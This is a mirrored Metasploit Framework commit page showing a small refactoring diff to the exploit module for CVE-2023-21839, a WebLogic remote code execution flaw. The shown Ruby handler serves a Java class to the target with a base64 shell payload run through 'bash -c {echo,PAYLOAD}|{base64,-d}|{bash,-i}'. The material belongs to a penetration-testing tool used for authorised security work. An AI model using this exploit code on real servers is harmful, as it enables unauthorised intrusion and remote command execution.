github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-07-18 18:31:41 +02:00
Code Releases Activity

Slight efficiency improvements

Browse Source
This commit is contained in:
Grant Willcox 2023-05-24 17:36:39 -05:00
parent e80987ea59
commit 7ca7c6aee1
No known key found for this signature in database
GPG Key ID: 67522945A18C5562
3 changed files with 7 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/CVE-2023-21839/PayloadRuns.class
View File

Binary file not shown.

4
data/exploits/CVE-2023-21839/PayloadRuns.java
View File

@ -1,3 +1,5 @@
import java.util.Base64;
public class PayloadRuns {
static {
try {
@ -6,4 +8,4 @@ public class PayloadRuns {
ex.printStackTrace();
}
}
}
}

9
modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
View File

@ -375,12 +375,11 @@ class MetasploitModule < Msf::Exploit::Remote
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
vprint_good("Payload requested by #{cli.peerhost} using #{agent}")
file = File.open(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-21839', 'PayloadRuns.class'), 'rb')
class_raw = file.read
file.close
class_raw = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-21839', 'PayloadRuns.class'))
base64_payload = Rex::Text.encode_base64(payload.encoded)
command_length = (44 - 'PAYLOAD'.length) + base64_payload.length
class_raw = class_raw.gsub("\x00\x2C", [command_length].pack('S>'))
exec_command_length = 'bash -c {echo,PAYLOAD}|{base64,-d}|{bash,-i}'.length
command_length = (exec_command_length - 'PAYLOAD'.length) + base64_payload.length
class_raw = class_raw.gsub("\x00\x2C", [command_length].pack('n'))
class_raw = class_raw.gsub('PAYLOAD', base64_payload)
send_response(cli, 200, 'OK', class_raw)
end